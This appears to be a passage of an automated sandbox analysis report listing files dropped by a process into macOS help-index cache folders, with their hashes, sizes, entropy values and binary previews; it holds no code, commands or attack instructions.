Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\.......q:....TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....j._X#F..q.u....2....M....e....:8.%...YKs.......)A......AF.Cy...U.L..cK...;..+Mj.wFpHXT........#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'....b..}...C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&%n..Yf.6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&.<...i..6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&..`.YS.h6<.."a........F...q.A"&..Bo.R.....kb.7...q.A"&...q.A"&..I.L.....kb.7...q.A"&...q.A"&+.Z.#Cb.6<.."a........F...q.A"&. .^...s...q.A"&...q.A"&...q.A"&...........kb.7...q.A"&...q.A"&.<...i..M8...9........F...q.A"&..`.YS.hM8...9........F...q.A"&..I.L..0<-.f....2gPB<....p....P.k.....PQ.....'.rhQ\...._3^..\...]..ae.....}.c.K.Y........q.A"&

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.DiskUtility.help17.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	65357
Entropy (8bit):	7.704443686688588
Encrypted:	false
SSDEEP:	1536:GNg+V2OLXSUj5AJXKzyROEwImz3G8N5EDXcVW1si+71SVm02bWNPu:GNYOLCW5iKzAvY3N5EDXcVW1si+x4mnx
MD5:	A57F753D7B49F3B2E53E856D45759B92
SHA1:	DCC5979B0955CEF6568158002DE0088DA1369B66
SHA-256:	03DEC90EDE480F389B8BE3E4AC89999708BDF51E84F3BA2070646A673B8BCC49
SHA-512:	FEE930D0A918DA002972E8AC8D036AEB708633ADFC8FF6CBD587931E9B8BE58F0AF563262C29D94C08269513998B3F012258DE00D4CE13D2878CBA4051441AA4
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.~L....>..P.>.......&....O..(.6I...>.F.=.u..['2..SHIPC. ...p.....v..O.....?;6.$.6./e.Q.a;._..* }...Y../.a./.....2..A.@!,....{.....q.qi...0./..R."..D\|X..ol.%...1..<{..p..,9.n..Dr..M..{......3.._m.Zb-.8..IL.M.i..M.]t..?Ewk........-<..z....dh...<..!....d.... 2.....v.I.#`%..t _.....\|-H.C. ...p.....v..O......$._\...e....E..xD.!-2$.......D{..p..,9y...<..<..M..{......3.._....=.....I..m.Y....q..,;.v.w..s....G.z....dh...<..!....d..7M.+.....n....y\|.FP)pGg."....1..M.3z.W.....v..O......$._\....y..0.q....>..JU..t..........P.z....dh...<..!....d....4.O.......I........{...V.:.....h...#.....v..O.......E6.'.....K...B..l=..."I.=/.kc.#A.\|t.....S!......,.....c.;.U.s..(t..x&.o.....>[_.I.O..bC.]...C.l...2..A.@!,....{.....q.qi...)..&..h.!.I....>..JU..U!o..z.....P.z....dh...<..!....d...E.........I..nR.W(]..p..(Y.....h...#.....v..O......>:G.zJT

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.FontBook.help8.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	29179
Entropy (8bit):	7.564939949286306
Encrypted:	false
SSDEEP:	768:GEa4oGpfFN+VTxEzhbW2vsuEKLBPNxn8b:Gio2fFNeEzh/suEK1PYb
MD5:	B506C2C0F477FD8B1F69FFEAD3DA28EF
SHA1:	13701CB0F1C7149BEB8BC296BFE36DC1730B656B
SHA-256:	9F99B2C3BCA9C45EE67EB1DEE6DCC6FF1F26747696B76A8361DC67466BFA23A5
SHA-512:	F58C236A47A1513036E0568F950B711EFBE2924DEC9507F0A2BF946A056C6776F3AD28AA85D7503CB634C2C8DE4380DFDF7782AF233090E9EA90632C0821398A
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..........S..3,.=..o..~n....j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{.<q.....F. i...hb;3......$..^kc.#A.\|t.2..........,.....c.;..U..8...u;.'..P.`.$6/8.$.- ..s....G.z....dh...<..!.u5>....>>....\|.L..c.)$i...\.;.{..p..,9]Y.z.r...M..{..x..m...U...D_J....\|-.8.....\| .kc.#A.\|t.....S!......,.....c.;..2...r..m.y.......V/...s.Zq......$.z....dh...<..!.u5>....>..i&\.6...{{..G.O.....1 .>.r...96..M..2...x.C.R.%..P.@.....}.:..S..3,....q.l...1..\|.b.P.....^...6.C(.(wa.;.<.h.^.)-..G.!A.S.9.H\|.xv.......TJ.k.S...1..^..#......8D_..........g....).}...K.w..(...g.&;.rW\|8>;...2....q.A"&...q.A"&..O.)y........F...D....n'..^p......y..{.P5{.F...q.A"&...q.A"&...\T....lZ..h...O.b2......y...!Z....n'..^p.B..x.&....q.A"&..O.)y.xl.j.\|...m..9.n.....K..O.)y.;...2....q.A"&...q.A"&..O.)y.J..L.y....m..9.n.....K..O.)y.;...2....q.A"&...q.A"&..O.)y...d.+:.G

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Grapher.help2.6/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31659
Entropy (8bit):	7.533566407057075
Encrypted:	false
SSDEEP:	768:Gr7zJdIHqxkiHNPpUd2tlwuP4RxFZSck4JVPt7t:GrXJSIHNaQdP4RxFZScVrh
MD5:	02C9E5CA9E84146E96140767D6DDC2C9
SHA1:	BDC6C6034EFBF0F693CAE5FD97F3417687B6686B
SHA-256:	C11F1A6950ED402E3E0B6AE4BEE871CDC00B9212D8E13A3069021F9CF017715D
SHA-512:	E50D0A3629E87BC205A2AD211FAE628D2E326BEAD8C35EE28D4C1BD931DFE9DF163FD4B0DB6E929B86DE603F5F4DA627A09C789711D3E841C0F08069E8DA58C2
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH..._....9...=5.+..\.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.)9o.....,.C.".3wD.F5....y.MO!4...V.:.....h...#.....v..O.......sq5......[......'....t..~4/kc.#A.\|t.....S!......,.....c.;...[.pL..F.2..16.#.."......=/.a./.....2..A.@!,....{.6,..s(..Z....eF..d..-.~....3./....m.Z.{..p..,9.n..Dr..M..{....h..0.%..r.W2.B.....p8....:...:w.....ilBI..>s.{...u..N4.a..(..^[..(..b.....a6f...;.o...`....s....G.z....dh...<..!.x.X....sCP.I.T..7..e.......<...~'.A.....r.~R.6..M..2...x.C.R..eS...l...4.yj..z?J.(...h.-.. 1..pUtf* Z...P?.P.....^..p...r%....U...9u.<.Fz..D.F5....3.\|..yk;4.=P...V...h...#.....v..O......I.=7...\|).......'...Rv..,..kc.#A.\|t.....S!......,.....c.;..t.........T......./9.{...H. ......*,....j.k..Y3."...s]...<_.EM ...q......:y..'0.4.........~...."..z.M4..g3SX.!.`...q.A"&...q.A"&/.<.8.....D.]....h'...vM..j..<.V.J...

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ImageCapture.help7.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	25443
Entropy (8bit):	7.318271373402448
Encrypted:	false
SSDEEP:	384:JoitY5b6DTR2kX6Mo7o/IIH6KSKCHHquXJ/Y:GB5baTRRqMo7oxH5sHKu5/Y
MD5:	07820FC06272193A1ECA696421061333
SHA1:	445355AABCB49829D8DC5EE574A6DFA467EB78FF
SHA-256:	2741A1260791BD99FDB7612425543E559FF4F9E82AA55E5E5836CCCA62D1EF1F
SHA-512:	8F238B562D9416BA3E839C6E92A2170E67D460909498BBD00C28D051C470C0B97B64A94D69DD15EC16CD81FB31FFEC4BF0C1DCFBC4CAE6E7D0245CD1C073DC17
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:............\...m..........j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{......q.".Q..i.G.....5Q...z...f3kc.#A.\|t.2..........,.....c.;....^...-.S..$w<.....].."....1...:..+.....v..O......w&...u#..,.1s....\...#...B...1..\|.b.P.....^..p...r%......yb..%=..Mb..{..6..G."...=.B..z.R.6..M..2...x.C.Rf~A>].{K...!jqHz...g-..Zh......$.z....dh...<..!.QM..9.@.1.*..jX..Pm.E......E.kc.#A.\|t.....S!......,.....c.;.....L.I..bC{..+Hz...g-..)...W....$.z....dhO]..S.H4QM..9.@.........Z<.3....b...6=...X. .C.d..V.!^..W .=....`..y[b.<{.?`.A)/.d6.. &..j.I=...m..'V.{..]..J.#.\...6<.."a.....q.A"&...q.A"&...q.A"&N..<.i..V........KvC..\.D.........=.$k...q.A"&...q.A"&...q.A"&.V.#.S..t...Z.)Q..Lu.8.,u.e.].Kl..KvC..\.L[=.Z./.{.P5{.F...q.A"&..Hc."..,.j....MI5..i....q.A"&6<.."a.....q.A"&...q.A"&...q.A"&.....j..,.j....MI5..i....q.A"&6<.."a.....q.A"&...q.A"&...q.A"&h...bp..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Mail.help11.2/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	153219
Entropy (8bit):	7.941951536827372
Encrypted:	false
SSDEEP:	3072:GKnojlfmVSDzAD3zE6GO59JOj0uIiLY3V0xUKf2v4xurK:h0lfmVSDzAD3w6d20ui0xUKIKuu
MD5:	162317273397B10FA748928872E191F0
SHA1:	2DFC96C0C2306D5FB45AA770F3491B406EB787BD
SHA-256:	B94C830383025598696ECC080261A74CB8A7808D2507BCAE8D69DC52C54AFBFA
SHA-512:	30F805B19226CECCBD4FA35BF180D8D3DD901527BFAF6763062C0624EB3F0DA4BC20D5A6366CBB10E3A6F1F35F9E18558999D2BB4DDE2A7E2684A0E75AA20B9F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.!..n7<u.JL..g...m..........j.k.P./.I....CJ.aF}A.s.!..,A...U..D!,....{..5p..O.f.qWkn..=.s...3...kI.c.kc.#A.\|t.2..........,.....c.;...}.>.M.O..$....v.A.B..p..(Y.....:..+.....v..O......@..x'.n..5M....O.....I...J%..X..@Y.......v..O.....a. .E6......s......E.8PR.h.S.#.kc.#A.\|t...tA>.......,.....c.;.....E.8PR.h.S.#..=.s...3...,P..xkc.#A.\|t.2..........,.....c.;.j....Y.7.f..hF.'P.!...!..3....E....:..+.....v..O......~.>~E..>9.. +..1X.yD6n..U....^.1..\|.b..........p...r%.......$.y/A..6.c!.o{.s.(...z..B..z.R.6..M..2...x.C.R..@..U).q6.u.+.r..4.M....8.a...`....$.z....dh...<..!..T...0.}....).../*..b.R.]...q)\|u.^N...<..>s.{...u..N4.J+N...a...^.x..6..t..,.8..B.X......dCD...h...#.....v..O.....:nr.o..v...`!..X._W...}^.....u.^N...<..>s.{...u..N4.&.+.;..q.@.e.1.....[.[.p.E..n.c{..p..,9.....A....M..{... ..t....u...S.......7....d._...@6... Z...P?.P.....^.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Maps.help2.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	34740
Entropy (8bit):	7.6090543086295765
Encrypted:	false
SSDEEP:	384:JoqBkfG9ws8+hJHhGiCvT7YWpZ5D1fC/W+DtjliHVMpDbBTSiqplqWeoFITblpX0:GpGl8uJ8Tr7YWgjlVpDlTSiqpfKntu
MD5:	987AE6D915AC829A76633AA54F5F2DFA
SHA1:	B6A14FC9CB2BFFCC242377151268C177532CC6F5
SHA-256:	A7AFADFA1F92833B0A149EBC5A04AFD5DAAEF678FDDEA545936E36C306CE8121
SHA-512:	37A1BCDB43023CBD4F1DF847E5B00E600A0885E7E1068659B9874183F657DECF62BADDF3663FE89C925979B0F0A6412CE1481958649349AAD18794C33CBC29CF
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.Q...Q..d.$e..0m.2o..m<4z.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..G.(..,....[..}...41q.TU....Gf..Xh2...0...h...#.....v..O...../.wr.@.A8..e..9,....@..e.7..-.. kc.#A.\|t.....S!......,.....c.;..]......^.N.Wr7J.......'...o./.a./.....2..A.@!,....{..5p..O..>.!!'.....J....6....h...gqZ...{..p..,9.n..Dr..M..{...G.5&g.4.]..m.<.L..A......{.;\..c.......ilBI..>s.{...u..N4....G...~.S.....=.d..<C.U..@h.kT...t...s....G.z....dh...<..!..d.nY.r..........Q../.k............\.....r.~R.6..M..2...x.C.R...D.7..:....E...8....z....."ya.t.l{d.N. Z...P?.P.....^..p...r%.BG$.I..D.d..F~M..41q.TU....1....R........h...#.....v..O.....8.9../..UE...0.i%.v..k..V~..kc.#A.\|t.....S!......,.....c.;.....DY+{.@....WiU...i.2Q.c.\)../.a./.....2..A.@!,....{..5p..O.P......Q.v.v.&%.G.!A.S.9.H\|.xv.......TJ.k.S...1..^..#.....S..XY.X..2.].....J.y....,w.\|..T...(...g.&;.rW\|8>

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Notes.help4.5/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	59285
Entropy (8bit):	7.62031787565684
Encrypted:	false
SSDEEP:	1536:GUN3eI03msL4kd5y5fo8ZAPC3CsaceoU+Wj:GC3Qd5yW8ZAqyB7N+Wj
MD5:	E5964674D00E5739DBCE646F5C9DDA69
SHA1:	6BC0BBE9838627232742FEF9FE149683DC55BE3C
SHA-256:	1722828C2EB11C452872D5F2FD75CB4F13EFFAF208A6D0DBC4332202E9BCD5A6
SHA-512:	91AA67ACF09F66354E40C0155FDC34F7391380F44DC9742317D7622FB56DD87ADDE97C4287C51F141E289A5AA394FCCBD29F1AFBEC19C224D498B840F86D99E3
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......Z..Q.0.\-^>....i..J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%..B....h.Ev,..My.]).Z.......g.I...J%....h...#.....v..O.....?..\|..b.....2........n*...Go....kc.#A.\|t.....S!......,.....c.;..W../....j. .E...k....N.\|.L..^/.a./.....2..A.@!,....{.;%-s...y.5...E _p...)...y..$.(;GTe.f.T{..p..,9.n..Dr..M..{.....o..v..9.G[.......D....N.O...U"9.........ilBI..>s.{...u..N4....<b)]...\|b...@Z..~..K.N.P....&....s....G.z....dh...<..!.Wa'.Zj..'....,.g..Z/."..k.#...`W.U.......r.~R.6..M..2...x.C.Rw....b..G...S.[`..]F....~K..d;.vZ.z. Z...P?.P.....^..p...r%..@..P.i.q.u...=.My.]).Zt6.Q....$.4EV.B....h...#.....v..O....._.x...e.?..\|..@..BD..W!3....:..Skc.#A.\|t.....S!......,.....c.;..<...C...J-.......Y.....sus..Z}/.a./.....2..A.@!,....{.JH....(W..f.g..a....z....Cu.[.....\|...{..p..,9.n..Dr..M..{.....eu%........D.T..._.k.4.sM..>.....t].....ilBI..>s.{..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.PhotoBooth.help9.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26147
Entropy (8bit):	7.503199311480304
Encrypted:	false
SSDEEP:	768:GS7ApgaPKQhn6wxFrJCFXI67xt57uZHIU:GSlaPP6wlCFYGt57yoU
MD5:	C8FFCD3C74C674AD4E0B9978A3A39E8D
SHA1:	1D9864DA7B596711419F9A94FC32A7CF1161A379
SHA-256:	B7787C9196456565F977D561B277F6C69D35475121CB3E626078F9F6083FC72A
SHA-512:	922E08AF47F59998EE87DEEBF8817749CAB74AECB75C59491A02795F04DDAA5F227FAA2C2508DE4444AF9C1F4ACD748701117BD28E6D6A96A049C07882AE77B3
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:......}H..J .P.....&...J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.....=.?....\|.x..wW....(... .G.....M...h...#.....v..O.....th!...I.]...VB...ru......`.r.Hkc.#A.\|t.....S!......,.....c.;.#=.<..\'...n.iqvr....9m.Y.n.B.vI/.a./.....2..A.@!,....{.Oa+.U.X...D,P..%..[..G.B.T.d..\|...x\|{.'{{..p..,9.n..Dr..M..{..E.R~.....a....(.......z%....r^..-I3.....ilBI..>s.{...u..N4X..z.-.)..... FS.?tF...Z./(X.L.+.U..O.6..s....G.z....dh...<..!.....W@............./}......_\.&..Q.~....r.~R.6..M..2...x.C.R&\..&.FFTV.;..,.q..w,..U...<X....I..n Z...P?.P.....^..p...r%.4...>..D.<U{0l.u....2....M....e....:8.%...YKs.......)A............,z......."....h..0.H.....q....#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'....t......C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a......*..F...q.A"&

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Preview.help10.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	81566
Entropy (8bit):	7.764332346911975
Encrypted:	false
SSDEEP:	1536:GlT9R0ZDWqHjnPk0tlgCeDahlfSdQpT9RgCD9xzZj:GWDZA0nN7qdGT9LD9Jl
MD5:	E28EA7F26E6296F8D08E183032456FF3
SHA1:	69BF757C312C1E2F16D242314DCEEF060692AACC
SHA-256:	BFB012C2001E0977E6340E5D38FBEDBF1C466F9BE7557EA7F79D6A2149293002
SHA-512:	52EF3F445D0C51E10B2795B38D551C6F463C4128EC4AB3024F316CDDED54F9390285AE846821EB58B3216C00E03DCCE1E798DCFA34441CD4DF8FF922B9DF4692
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..}'."1\.#jJ.1...R...g..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....Z....-......M....F$..G..F.%._..>s.{...u..N4Xo....j.E.e..a.....5....P..0KK{..p..,9r........M..{........n..>.......@~.o....&3..8f;H...2..........,.....c.;..u,...Y.\|.srG.`L...k3..kc.#A.\|tO..8{.......,.....c.;.L...k3......@~..)ZX.mfZkc.#A.\|t.2..........,.....c.;.jV....>~<-?......^.Y.0-~."....1...:..+.....v..O.......ium.....\."...U....rF .4.0.1..\|.b.P.....^..p...r%...e4X...^..[.2D .:.juv..dY3#.......u..P.....^..p...r%...E.a...Q.$V`.G.!.$w...."....1.X..@Y.......v..O.....Dp.....O..$...=.=.ZGb.3....E....:..+.....v..O.....0..E..#....%..S.)p..v.5..MEo}>....ilBI..>s.{...u..N4Xo....j..w"...M.<-?..........(...0..g....:..+.....v..O........i.q`..L..oK.o.Q.8...n{.Mj.1..\|.b.P.....^..p...r%..\c.W.}Vb]..>0.#.8]K...nt...^...{..p..,9.n..Dr..M..{....Z.1.....

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.QuickTimePlayerX.help10.4/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	43612
Entropy (8bit):	7.755343802045572
Encrypted:	false
SSDEEP:	768:Gc2tluoiW/f015VzzSOX8SJQqECQpxeRR2z/nVwW/:Gc2twYf015NMSExsR2VwW/
MD5:	A8269657B6B1384699FC55DCD23A377A
SHA1:	8F694ED3A4F984373ED9D54480006F32EEFCF490
SHA-256:	283055E95BB89BEE7E1A89CA2D69218A1F0CE6FDF74F163783163D83B36109A6
SHA-512:	DE490DB000CDB6C12AE19C5FE879D44BDF413559594F84E9BDA9D36085C9A6E0B43B56CA1EA97B9ABBDD6BDECB120717CA7148EDE0A27876E9986E75773BE0DB
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.....M?Q.\|L.s.qm..A.9..j.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.2.H....\|..4..\|....=.... .W.J.s.....dCD...h...#.....v..O.....]......1..B.\|.`.9M9..}..E=1k...kc.#A.\|t.....S!......,.....c.;.^.?Z.x.i.x..?..Xx.)}........5x./.a./.....2..A.@!,....{...i....+ER.z..s.......8.....t.@..P..{..p..,9.n..Dr..M..{..be....n......... ....dw...hW.....B.....ilBI..>s.{...u..N4..`....f..G.kX.............lW......._...s....G.z....dh...<..!.....e.....?....[.8\|V`..FU.R.vQ2uy.sX..>...r.~R.6..M..2...x.C.R..{6.j_E.....E.N..g..Uf....H...rF .4.0 Z...P?.P.....^..p...r%....S4...............=.........`ZG.....M...h...#.....v..O......7....3!3.........>.\\8\|R.6.L.kc.#A.\|t.....S!......,.....c.;....+...m.^v.}.7.ZA.gq...5u=./.a./.....2..A.@!,....{...i...F.w.,.-.85...2.k..i.q^E..]:...U.{..p..,9.n..Dr..M..{..be......".JU..i.mP9....)~.9.O...5......ilBI..>s.{..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Safari.help11.0.2/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	138850
Entropy (8bit):	7.93887323509826
Encrypted:	false
SSDEEP:	3072:Ga6VbjcKiL3w8Hc6G6PafftX618Z/SnJxVeSD8yE0eJ3j:d6VvcKiLk2Oftq18pS3p/tA3j
MD5:	08FB50C9C0CDFC77FB96208FB63F16E7
SHA1:	B7CB39909EEA2B39F4242BB4E709F11A8A9260D3
SHA-256:	7D5AA32B2B9456F3DBD037B7A9D2B5DA10D7DD2C65631A3B01845E9986006338
SHA-512:	C0540F7B6FAFE786A63A294C1C3134BCD640121D0909AECB52956F9208881C60357669C87D8D4F79B64B818B945444C93FC2C52C2EAE4EB71879C6121B582701
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..(..;.wI.%.24.....s>o<.TJ.k.S.U.4.......v^.;....7...vP...Z...M..{....H.\|..\=(....7.4..H.>...'.I...I...J%....h...#.....v..O................:.zi....!....'.7.Ru.^N...<..>s.{...u..N4.U......S=u.C...O.o..M[.5....$....F.%._..>s.{...u..N4...=....e..%......!......B.u.^N...<..>s.{...u..N4.U.........3n.8O.o..M[..f.........F.%._..>s.{...u..N4...=..'W..t.,O....!.....y.u.^N...<..>s.{...u..N4.U......t......nO.o..M[...o=>p.T...F.%._..>s.{...u..N4.........H....F...O.......`%.)#n..H>_.z....dh...<..!.w....6N\5..v..;zC....+.d.U.<....m,;..W.6..M..2...x.C.R..'...........W...{......gcL/j.....u..P.....^..p...r%...V..;K.?.y=.].+... ...0..g..X..@Y.......v..O........db..<-?......T... ..Xh2...0.............v..O......^..i.....\...n...$.z..q.a...].1..\|.b.P.....^..p...r%...,a...$9..d#.}..g.?.....E/.v(4.B..z.R.6..M..2...x.C.R..1...4.L\b.+-.+..'u.]T.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.ScriptEditor.help2.10/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	45908
Entropy (8bit):	7.736521965567927
Encrypted:	false
SSDEEP:	768:Gcleu+JqM6CA5tqUAj5D8ZzXcJCsOd4O3BsYav1UeUY7fqKH7fqo6xlyZFuKIrh2:G5u+JqM3A5tqUAj5D8ZzXIFOd4O32YaT
MD5:	64B59EA5E6F4552F46C847FE0EA223BB
SHA1:	24DAD1B02638B7C866115FCFE3E99656A82A76CF
SHA-256:	59F7F4AC8AD167C5888CE4E6232A4B3691AA4781C13E1DCA1CAA097F4212BC33
SHA-512:	D4E8045584FDDAE1D3DBE67033D7D947B63101C383DDD1076D805E9BDC51B9BB6901E5A75FB7C99BF40BBF0D3D9ABED744C0A71C54403AA2E99A33F8ACC6746A
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:..l....:3.N..,..UR....x.o.....I.....J..7..=.'..OV.c..$k.R...0.....,.....c.;....SF.e....q...N..,..^X......5.RK..6..M..2...x.C.R.fS..N.Y.....u. ..1.[.9."ZN.7}I{..p..,9r........M..{...@.{......A..v.B.E}%.e.o....r..0..g...M.3z.W.....v..O.....Q }..:...H;T.....P>.~...PO.........P.z....dh...<..!.../..!j.Q..y..)...i....`.X..y....xI...g...P.....^..p...r%.&..w.,U..;..N............. .D..kc.#A.\|t$k.R...0.....,.....c.;.cI..{....=..V..z.f.s...<...y..j.b3.....z....dh...<..!.../..!j.....n.P..........W...&67kc.#A.\|t$k.R...0.....,.....c.;.cI..{.....}}..&.N..,.5<l.{>.C..5.RK..6..M..2...x.C.R.fS..N.Y...F=9...ol.....X.##[nI./.a./....A..MmI.!,....{.]...&.p...j.."aC.....d..N..,...P.#V...5.RK..6..M..2.....c...fS..N.Y..,l.a.. ..1.[.9w\.....{..p..,9r........M..{...@.{...........B.E}%.eQ_..^.4.$.4EV.B...M.3z.W.....v..O.....Q }..:........?..r..s)Mr.h....+.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Stickies.help10.1/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	6.8895773819422335
Encrypted:	false
SSDEEP:	192:Jo2iigZZ2Qiu4kUCj87tWbvR4LwvfyrmXTuigsv2PY:Jo2iirQitE87ovR4sHyrS0EYY
MD5:	E0F975DECC99D9053670E108A58A69F3
SHA1:	20B2C2B4D9A3B60D436A2096C99A717BDF5AC884
SHA-256:	FE4EB018E7E8E03A4F2CD6F8EF1A63CB67FFE317A517C89D1E1E2385DE4DCD42
SHA-512:	9A9FC2D9FC884CB1D2E9A475B954B2417CC521A0F0B32BBA1045167E1C2FD36FA82ED0C27035E31AF93D03BFD1286E878A3C48DE78AE47D09E8DC0E325275D9F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:....T..\|\U....3..eFb..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{..;.S...E]oQ.....u....2....M....e....:8.%...YKs.......)A......AF.Cy...U.L..cK...;..+Mj.wFpHXT.Y.k.....#,..sH..!2G......kb.7...q.A"&...q.A"&0u.5.a.#...7.z?jM@$.[.#../...v.;J.B.:...q.A"&...q.A"&...q.A"&.l.f".'.K.W..K..C.%...o1..!........\7....rW....v.]45...q.A"&3...S...6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&%n..Yf.6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&.<...i..6<.."a........F...q.A"&..I.L.....kb.7...q.A"&...q.A"&..`.YS.h6<.."a........F...q.A"&..Bo.R.....kb.7...q.A"&...q.A"&..I.L.....kb.7...q.A"&...q.A"&+.Z.#Cb.6<.."a........F...q.A"&. .^...s...q.A"&...q.A"&...q.A"&...........kb.7...q.A"&...q.A"&.<...i..2.A..bT.......F...q.A"&..`.YS.h2.A..bT.......F...q.A"&..I.L..0<-.f....2gPB<....p....P.k.....PQ.....'.rhQ\....W..f.r.,.b.(..oN....0,...)p.......q.A"&

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.Terminal.help2.8/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	107208
Entropy (8bit):	7.837813738299079
Encrypted:	false
SSDEEP:	1536:GokKX4AGJAy/lLVoW1YkewLWyDHCc4HkGPy8Vzpg19TDIL1fH:GzAGZlJoIYkAyB8kGPfRW9QpfH
MD5:	F59AC331ACBDBB415B7F26A4C1996989
SHA1:	BC24B10273676564FDD0BEDE13B2BD8082F39EF6
SHA-256:	A3CE5D670CBBFF5A01746131AC1C8451066738E430ABCBDD8D783F34CADB567F
SHA-512:	FDB6527B0BE7E38446D7D2B52F4A8D1C157C7E5F943C077907E59AE87E18A69E0D951BCC64DD5A46541C3A2EB734BB64BAEDDAD5A927A0FEAE02EFAE8E9E301E
Malicious:	false
